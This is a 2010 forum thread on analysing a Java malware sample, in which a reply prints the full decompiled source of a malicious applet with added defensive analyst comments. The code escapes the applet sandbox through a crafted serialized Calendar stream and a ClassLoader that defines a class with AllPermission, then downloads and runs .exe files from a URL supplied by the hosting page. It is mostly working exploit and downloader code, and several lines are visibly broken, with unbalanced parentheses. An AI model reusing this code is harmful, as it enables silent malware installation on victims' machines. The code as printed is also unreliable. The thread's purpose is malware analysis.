
View Full Version : JAVA malware


BATMAN
February 28th, 2010, 04:58
How can I get a malicious link from Java malware? I use Java Decompiler, but I haven't found a link... Please help (I'm not strong in Java).
Here JAVA MALWARE
pass infected

P.S.Sorry for rules....

Silkut
February 28th, 2010, 06:51
Hi,

So I guess you decompiled the Java class and found out the strings were either encrypted or concatenated/appended all together.
It is also clear that it is dropping an exe with a name randomly generated.

You could try to patch the code to get it running (in an isolated VM) and retrieve the URL while sniffing; you could also sort every string and manually process every manipulation.

MALICIOUS CODE

PX.class
Code:
// Decompiled by DJ v3.9.9.91 Copyright 2005 Atanas Neshkov Date: 28/02/2010 12:43:59
// Home Page : http://members.fortunecity.com/neshkov/dj.html - Check often for new version!
// Decompiler options: packimports(3)
// Source File Name: PX.java

package myf.y;

import java.io.*;
import java.net.URL;
import java.security.AccessController;
import java.security.PrivilegedExceptionAction;

// Analyst notes (defensive): PX is the stage that LoaderX defines under a
// hand-built AllPermission ProtectionDomain. Its constructor immediately runs
// run() through AccessController.doPrivileged, so the download-and-execute logic
// below runs with the privileges of the domain that defined the class, not the
// applet sandbox. Nothing in this class contacts the network until `data` is set.
public class PX
implements PrivilegedExceptionAction
{

// Decodes a hex string into bytes, two hex digits per byte. AppletX.init() uses
// it to turn the embedded hex blob into a serialized-object stream. There is no
// validation: Character.digit returns -1 for a non-hex character, and an
// odd-length input hits charAt(i + 1) past the end and throws. The local s1 is
// never read; it is one of several filler literals scattered through the sample.
public static byte[] StringToBytes(String s)
{
byte abyte0[] = new byte[s.length() / 2];
String s1 = "sdjffjjjjjjjjjjsdfsduuuujf8ds";
for(int i = 0; i < s.length(); i += 2)
abyte0[i / 2] = (byte)((Character.digit(s.charAt(i), 16) << 4) + Character.digit(s.charAt(i + 1), 16));

return abyte0;
}

// Download-and-execute routine. `data` is the base URL and `cc` the number of
// files to fetch; LoaderX.bootstrapPayload copies both from the applet's "data"
// and "cc" parameters via reflection. Returns null on every path, and every
// exception is swallowed, so a failed download leaves no visible error.
public Object run()
throws Exception
{
// LoaderX.bootstrapPayload calls newInstance() twice: the first time the
// fields are still null and this guard exits immediately; the second call,
// after Field.set, does the actual work.
if(data == null)
return null;
try
{
String s = "os.name";
String s1 = "00057372001B6A6176612E7574696C2E477265676F7"; // unused filler
String s2 = "Windows";
String s3 = System.getProperty(s);
String s4 = "00057372001B6A6176612E7574696C2E477265676Fasd7"; // unused filler
// Windows-only gate: on any other os.name the loop below is never entered.
if(s3.indexOf(s2) >= 0)
{
int i = 1;
if(cc != null)
i = Integer.parseInt(cc);
// One download per iteration, from data + "0", data + "1", ... data + (i-1).
// The base URL itself is never in the jar; it arrives via the applet tag,
// which is why static decompilation alone does not reveal it.
for(int j = 0; j < i; j++)
{
URL url = new URL((new StringBuilder()).append(data).append(Integer.toString(j)).toString());
url.openConnection(); // result discarded; openStream() below performs the real request
InputStream inputstream = url.openStream();
String s5 = "6E69656E744900166D696E696D616C44617973496E46697273745765656B4900096E6578745374616D704900157365726961 6C56657273696F6E4F6E53747265616D4A000474696D655B00066669656C64737400025B495B000569735365747400025B5A 4C00047A6F6E657400144C6A6176612F7574696C2F54696D655A6"; // unused filler
// Drop location: <java.io.tmpdir>/<Math.random()>.exe. A randomly named .exe
// appearing in the temp directory, written by the Java process, is the
// on-disk indicator for this sample.
String s6 = (new StringBuilder()).append(System.getProperty("java.io.tmpdir").append(File.separator).append(Math.random()).append(".exe".toString();
FileOutputStream fileoutputstream = new FileOutputStream(s6);
int k;
int l;
// Byte-at-a-time copy; l ends up holding the number of bytes written.
for(l = 0; (k = inputstream.read()) != -1; l++)
fileoutputstream.write(k);

inputstream.close();
fileoutputstream.close();
String s7 = "6E69656E744900166D696E696D616C44617973496E 46697273745765656B4900096E6578745374616D704 9001573657269616C56657273696F6E4F6E53747265 616D4A000474696D655B00066669656C64737400025B495B000569735365747400025B5A4C00047A6F6E657400144C6A6176 612F7574696C2F54696D655A6"; // unused filler
// Executes the file only if at least 1024 bytes were written; presumably a
// crude filter for empty or error responses (assumption, nothing here
// confirms the intent). The JVM spawning an .exe from the temp directory is
// the runtime indicator to alert on.
if(l >= 1024)
Runtime.getRuntime().exec(s6);
}

}
}
catch(Exception exception) { } // swallowed: silent failure by design
return null;
}

// Constructing PX is the trigger: run() executes under doPrivileged right here,
// so a bare newInstance() from LoaderX is enough to start the download.
public PX()
{
try
{
AccessController.doPrivileged(this);
}
catch(Exception exception) { }
}

// Both are static, so LoaderX's Field.set calls populate the class, not an
// instance; they are filled in between the two newInstance() calls.
public static String data = null;
public static String cc = null;

}


LoaderX.class
Code:
// Decompiled by DJ v3.9.9.91 Copyright 2005 Atanas Neshkov Date: 28/02/2010 12:35:03
// Home Page : http://members.fortunecity.com/neshkov/dj.html - Check often for new version!
// Decompiler options: packimports(3)
// Source File Name: LoaderX.java

package myf.y;

import java.io.*;
import java.lang.reflect.Field;
import java.net.URL;
import java.security.*;
import java.security.cert.Certificate;

// Analyst notes (defensive): a ClassLoader that is also Serializable. It is not
// instantiated directly by the applet; AppletX.init() deserializes it from an
// embedded hex blob, and readObject() parks the resulting object in the static
// `instance` field so the applet can reach it afterwards. Its only job is
// bootstrapPayload(): re-defining PX under an AllPermission ProtectionDomain.
// A Serializable ClassLoader subclass inside an applet jar is itself a strong
// static signature for this family of loaders.
public class LoaderX extends ClassLoader
implements Serializable
{

public LoaderX()
{
}

// Default serialization only. Declaring ClassNotFoundException on writeObject
// is unusual but has no effect.
private void writeObject(ObjectOutputStream objectoutputstream)
throws IOException, ClassNotFoundException
{
objectoutputstream.defaultWriteObject();
}

// Deserialization hook: records this object in the static field before reading
// the default fields, so AppletX.init() observes LoaderX.instance != null as
// soon as ObjectInputStream.readObject() returns.
private void readObject(ObjectInputStream objectinputstream)
throws IOException, ClassNotFoundException
{
instance = this;
objectinputstream.defaultReadObject();
}

// s = base URL forwarded to PX.data, s1 = count string forwarded to PX.cc
// (both come from the applet's "data"/"cc" parameters). Declares IOException
// but every failure is swallowed below.
public void bootstrapPayload(String s, String s1)
throws IOException
{
Object obj = null; // never used
try
{
ByteArrayOutputStream bytearrayoutputstream = new ByteArrayOutputStream();
byte abyte0[] = new byte[8192];
// PX.class is read back out of the applet's own jar as raw bytes and then
// defined through this loader, instead of being loaded normally, so that the
// custom ProtectionDomain below applies to it. The stream is never closed.
InputStream inputstream = getClass().getResourceAsStream("/myf/y/PX.class";
String s2 = "6E69656E744900166D696E696D616C446179734 96E46697273745765656B4900096E657874537461 6D7049001573657269616C56657273696F6E4F6E53 747265616D4A000474696D655B00066669656C64737400025B495B000569735365747400025B5A4C00047A6F6E657400144C 6A6176612F7574696C2F54696D655A6"; // unused filler
int i;
while((i = inputstream.read(abyte0)) > 0)
bytearrayoutputstream.write(abyte0, 0, i);
abyte0 = bytearrayoutputstream.toByteArray();
URL url = new URL("file:///"; // strange url innit ?
Certificate acertificate[] = new Certificate[0];
// A fresh Permissions set containing AllPermission, paired with a file:///
// CodeSource and no certificates: this is the domain PX.run() later executes
// under. Any defineClass call with an AllPermission domain from applet code
// is the behaviour a sandbox policy or runtime monitor should flag.
Permissions permissions = new Permissions();
permissions.add(new AllPermission());
ProtectionDomain protectiondomain = new ProtectionDomain(new CodeSource(url, acertificate), permissions);
Class class1 = defineClass("myf.y.PX", abyte0, 0, abyte0.length, protectiondomain);
if(class1 != null)
{
Field field = class1.getField("data";
Field field1 = class1.getField("cc";
// First instantiation: PX.data is still null, so PX.run() returns at once.
Object obj1 = class1.newInstance();
// Both target fields are static; the obj1 argument is ignored by Field.set.
field.set(obj1, s);
field1.set(obj1, s1);
// Second instantiation: fields are populated now, so the constructor's
// doPrivileged(run()) performs the download and execution.
obj1 = class1.newInstance();
}
}
catch(Exception exception) { } // swallowed
}

// Matches the 5E8B4C67DDC409D8 bytes that follow "myf.y.LoaderX" inside the
// hex stream assembled in AppletX.init(); the stream would not deserialize
// into this class without it.
private static final long serialVersionUID = 0x5e8b4c67ddc409d8L;
// Written by readObject(); read by AppletX.init() after deserialization.
public static LoaderX instance = null;

}


AppletX.class
Code:
// Decompiled by DJ v3.9.9.91 Copyright 2005 Atanas Neshkov Date: 28/02/2010 12:44:49
// Home Page : http://members.fortunecity.com/neshkov/dj.html - Check often for new version!
// Decompiler options: packimports(3)
// Source File Name: AppletX.java

package myf.y;

import java.applet.Applet;
import java.io.ByteArrayInputStream;
import java.io.ObjectInputStream;

// Referenced classes of package myf.y:
// PX, LoaderX

// Analyst notes (defensive): the applet entry point. init() assembles a hex
// string, decodes it with PX.StringToBytes, and feeds it to ObjectInputStream.
// The hex begins with ACED0005 (the Java serialization stream header) and the
// ASCII inside it spells java.util.GregorianCalendar, java.util.Calendar,
// java.util.SimpleTimeZone and myf.y.LoaderX (followed by LoaderX's
// serialVersionUID), so the stream appears to be a serialized Calendar graph
// that carries a LoaderX object; deserializing it runs LoaderX.readObject(),
// which sets LoaderX.instance. The applet then hands its "data"/"cc" HTML
// parameters to LoaderX.bootstrapPayload. The many junk-named static strings
// and the split hex fragments are padding/obfuscation, not logic.
public class AppletX extends Applet
{

// Builds a second hex string from the static fragments; `serializedObject` is
// never read anywhere in this listing, so it looks like a decoy (unconfirmed).
public AppletX()
{
serializedObject = (new StringBuilder()).append("ACED".append(ff).append("269616E".append(a34).append("00A".toString();
}

// Applet lifecycle entry; everything below runs when the page loads the applet.
public void init()
{
try
{
String s = "000000";
// "5469" is hex for "Ti": it is spliced into the stream so that names such
// as "SimpleTimeZone" never appear contiguously in the class file.
String s1 = "5469";
String s2 = (new StringBuilder()).append("0010677265676F7269616E4375746F766572787200126A6176612E7574696C2E43616C656E646172E6EA4D1EC8DC5B8E0300 0B5A000C6172654669656C647353657449000E66697273744461794F665765656B5A00096973".append(s1).append("6D655365745A00076C656E69656E744900166D696E696D616C44617973496E46697273745765656B4900096E657874537461 6D7049001573657269616C56657273696F6E4F6E53747265616D4A000474696D655B00066669656C64737400025B495B0005 69735365747400025B5A4C00047A6F6E657400144C6A6176612F7574696C2F".append(s1).append("6D655A6F6E653B787001".append(s).append("010101".append(s).append("01".append(s).append("02".append(s).append("0100000121563A".toString();
String s3 = (new StringBuilder()).append("200014A".append(s2).append("FC0E757200025B494DBA602676EAB2A5020000787".append(s).append("011".append(s).append("01000007D9".append(s).append("04".append(s).append("15".append(s).append("04".append(s).append("12".append(s).append("8A".append(s).append("02".append(s).append("03".append(s).append("01".append(s).append("04".append(s).append("1".append(s).append("011".append(s).append("22000002DEFE488C".append(s).append("0000757200025B5A578F203914B85DE2020000787".append(s).append("0110101010101010".toString();
String s4 = (new StringBuilder()).append("6444617949000C656E644461794F665765656B490007656E644D6F6465490008656E644D6F6E7468490007656E64".append(s1).append("6D6549000B656E64".append(s1).append("6D654D6F64654900097261774F666673657449001573657269616C56657273696F6E4F6E53747265616D4900087374617274 44617949000E73746172744461794F665765656B49000973746172744D6F646549000A73746172744D6F6E74684900097374 617274".append(s1).append("6D6549000D7374617274".append(s1).append("6D654D6F64654900097374617274596561725A000B7573654461796C696768745B000B6D6F6E74684C656E6774687400025B 42787200126A6176612E7574696C2E".append(s1).append("6D655A6F6E6531B3E9F57744ACA10200014C000249447400124C6A6176612F6C616E672F537472696E673B787074000E416D 65726963612F446177736F6E0036EE8".append(s).append("000000000".append(s).append("000000".append(s).append("000000".append(s).append("0000FE4".toString();
// Deserialization of attacker-supplied bytes from inside the applet itself.
// The tail of this literal ("...6D79662E792E4C6F61646572585E8B4C67DDC409D8...")
// is "myf.y.LoaderX" plus its serialVersionUID, which is how LoaderX gets
// instantiated without `new`.
ObjectInputStream objectinputstream = new ObjectInputStream(new ByteArrayInputStream(PX.StringToBytes((new StringBuilder()).append("ACED00057372001B6A6176612E7574696C2E477265676F7269616E43616C656E6461728F3DD7D6E5B0D0C10".append(s3).append("101010101010101010101737200186A6176612E7574696C2E53696D706C65".append(s1).append("6D655A6F6E65FA675D60D15EF5A603001249000A647374536176696E6773490006656E".append(s4).append("88C".append(s).append("0002".append(s).append("000000".append(s).append("000000".append(s).append("000000".append(s).append("000000".append(s).append("0000757200025B42ACF317F8060854E0020000787".append(s).append("00C1F1C1F1E1F1E1F1F1E1F1E1F770A".append(s).append("06".append(s).append("0000007571007E0006".append(s).append("02".append(s).append("0000000000787372000D6D79662E792E4C6F61646572585E8B4C67DDC409D8020000787078FFFFF4E2F964AC000A".toString())));
Object obj = objectinputstream.readObject();
// LoaderX.instance is populated as a side effect of readObject() above.
if(obj != null && LoaderX.instance != null)
{
// The download URL and file count come from the embedding HTML's <applet>
// parameters, not from the jar; the page that hosts the applet is where
// the actual link lives.
String s5 = getParameter("data";
String s6 = getParameter("cc";
if(s5 == null)
s5 = "";
LoaderX.instance.bootstrapPayload(s5, s6);
}
}
catch(Exception exception) { } // swallowed: the page shows nothing on failure
}

private static final long serialVersionUID = 0xd30f41af207ff1c8L;
private static String ff = "00057372001B6A6176612E7574696C2E477265676F7";
private static String as;
private static String afc;
private static String afcdsnhbskjdbfsdhbfsjkdlnknbaskjbadjha;
private static String afcFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFha;
private static String lol;
private static String kol;
private static String gGGGGGGGGLGKGFJDHFDfdfgdhgfsjgfjsdgf7sgfjsdgfhgdf7ysgdfj;
private static String kkk;
private static String asa;
private static String abc;
// Pure junk literal; never referenced.
private static String a5 = "sdfsd fsdf hsd fkjw fekwe gfrjkg kj54 tkj nkj4 609hyi9h0009e433333333333333333333333333333333333349tugreo9ug 9rugjjjjjjj9 woiuwwwwwwwwwwwwwwwwwwuqrfj 29fu 09epwoooooooooog poreig iorehg oia;sjhdfiosjgf dhhhhhhhhhhhhh";
private static String klls;
private static String a1;
private static String a2;
private static String a31;
private static String a32;
private static String a33;
public static String a34;
private final String serializedObject;
// Declared but never assigned or read in this listing.
public static String data = null;

// Static initializer: assembles the fragment chain as -> klls/a1/a2 -> a31 ->
// a32 -> a33 -> a34. In this listing a34 is consumed only by the constructor's
// `serializedObject`, which is itself unused; the stream that init() actually
// deserializes is built from the locals s..s4 instead.
static
{
as = "00000";
afc = "44461794";
afcdsnhbskjdbfsdhbfsjkdlnknbaskjbadjha = "646549000";
afcFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFha = "6E69656E744900166D696E696D616C44617973496E46697273745765656B4900096E6578745374616D704900157365726961 6C56657273696F6E4F6E53747265616D4A000474696D655B00066669656C64737400025B495B000569735365747400025B5A 4C00047A6F6E657400144C6A6176612F7574696C2F54696D655A6";
lol = "73657269616C56657273696F6E4F6E53747265616D4900087";
kol = "6F6E7468490007656E6454696D6549000B656E6454696D6";
gGGGGGGGGLGKGFJDHFDfdfgdhgfsjgfjsdgf7sgfjsdgfhgdf7ysgdfj = "4596561725A000B7573654461796C696768745B000B6D6F6E74684C656E6774687400025B42787200126A6176612E7574696 C2E54696D655A6F6E6531B3E9F57744ACA10200014C000249447400124C6A6176612F6C616E672F537472696E673B7870740 00E4";
kkk = "2744D6F6E7468490009737461727454696D6549000D7374617";
asa = "010101010101010101737200186A6176612E7574696C2E53696D706C6554696D655A6F6E65FA675D60D15EF5A60300124900 0A64737453";
abc = "B0D0C10200014A0010677265676F7269616E4375746F766572787200126A6176612E7574696C2E43616C656E646172E6EA4D 1EC8DC5B8E03000B5A000C6172654669656C647353657449";
klls = (new StringBuilder()).append("87001".append(as).append("0010101".append(as).append("001".append(as).append("002".append(as).append("001".append(as).append("121563AFC0E757200025B494DBA602676EAB2A5020000787".append(as).append("0011".append(as).append("001".append(as).append("7D9".append(as).append("004".append(as).append("015".append(as).append("004".append(as).append("012".append(as).append("08A".append(as).append("002".append(as).append("003".append(as).append("001".append(as).append("004".append(as).append("01".append(as).append("0011".append(as).append("022".append(as).append("2DEFE488C".append(as).append("00000757200025B5A578F203914B85DE2020000787".append(as).append("00110101010101010101".append(asa).append("6176696E6773490006656E6".append(afc).append("9000C656E6".append(afc).append("F665765656B490007656E644D6F".append(afcdsnhbskjdbfsdhbfsjkdlnknbaskjbadjha).append("8656E644D".append(kol).append("54D6F".append(afcdsnhbskjdbfsdhbfsjkdlnknbaskjbadjha).append("97261774F6666736574490015".append(lol).append("37461727".append(afc).append("9000E737461727".append(afc).append("F665765656B49000973746172744D6F".append(afcdsnhbskjdbfsdhbfsjkdlnknbaskjbadjha).append("A73".toString();
a1 = (new StringBuilder()).append("0007571007E0006".append(as).append("002".append(as).append("00000000000787372000D6D79662E792E4C6F61646572585E8B4C67DDC409D8020000787078FFFFF4E".toString();
a2 = (new StringBuilder()).append("61727".append(gGGGGGGGGLGKGFJDHFDfdfgdhgfsjgfjsdgf7sgfjsdgfhgdf7ysgdfj).append("16D65726963612F446177736F6E0036EE8".append(as).append("00000".append(as).append("00000".append(as).append("00000".append(as).append("00000".append(as).append("0000FE488C0000000002".append(as).append("00000".append(as).append("00000".append(as).append("00000".append(as).append("00000".append(as).append("00000".append(as).append("000757200025B42ACF317F8060854E002000078700000000C1F1C1F1E1F1E1F1F1E1F1E1F770A".append(as).append("006".append(as).append("0000".append(a1).append("2F96".toString();
a31 = (new StringBuilder()).append("9697354696D655365745A00076C65".append(afcFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFha).append("F6E6".toString();
a32 = (new StringBuilder()).append("000".append(a31).append("53B7".append(klls).append("74617".append(kkk).append("27454696D654D6F".append(afcdsnhbskjdbfsdhbfsjkdlnknbaskjbadjha).append("97374".append(a2).append("4A".toString();
a33 = (new StringBuilder()).append("C656E6461728F3DD7D6E5".append(abc).append("000E666972737".append(afc).append("F665".toString();
a34 = (new StringBuilder()).append("43616".append(a33).append("765656B5A".append(a32).append("C0".toString();
}
}

BATMAN
March 2nd, 2010, 10:08
Maybe there is a way to debug it?